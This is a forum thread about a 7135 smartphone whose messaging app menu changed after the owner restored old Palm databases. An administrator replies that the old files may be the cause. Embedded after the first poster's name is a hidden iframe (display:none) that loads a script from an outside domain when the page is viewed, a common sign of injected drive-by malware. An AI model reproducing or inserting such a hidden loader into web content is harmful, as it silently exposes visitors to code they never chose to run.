+ Reply to Thread
Results 1 to 2 of 2
  1. #1
    A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Join Date
    10-14-2002
    Posts
    217

    Bizzare behavior of Messaging App

    Hi fellow 7135 users,
    When I first received my 7135, I programmed it onto Verizon's network, made a call, sent an SMS message, etc. Then, I ran BackupBuddyVFS off my SD card, and restored my databases from my old m515 onto the 7135. Everything worked well, except I noticed a bizzare change in the messaging app.
    I use a Penticon program, Hebrew+ Support, and perhaps this is the cause. But, when I opened up the messaging app before restoring my database, when I would go to send an SMS message, I could choose from a list of recent SMS numbers I'd sent to, but no longer. When I popped down the menu, there were two options: Settings and something else... the other had the About... option.
    Now, after restoring the databases, the messaging app has three options in the menu: settings, blocking and Hebrew. There's no longer an option for About..., so I can't tell what version I'm using.
    I'd done a hard reset to try and fix another messaging problem, and it reverted back to the older messaging app until I restored the databases. Has anyone else experienced this?
    By the way, I'm using SZ 1.0.13, MZ 1.0.27.

    Mike<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

  2. #2
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    perhaps you should not have synced the 7135 with your old palm files... did you do a cold boot and install the programs you want to add to the 7135 direct from the site you got them from (in other words without X-ferring files from your old palm to the 7135)?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts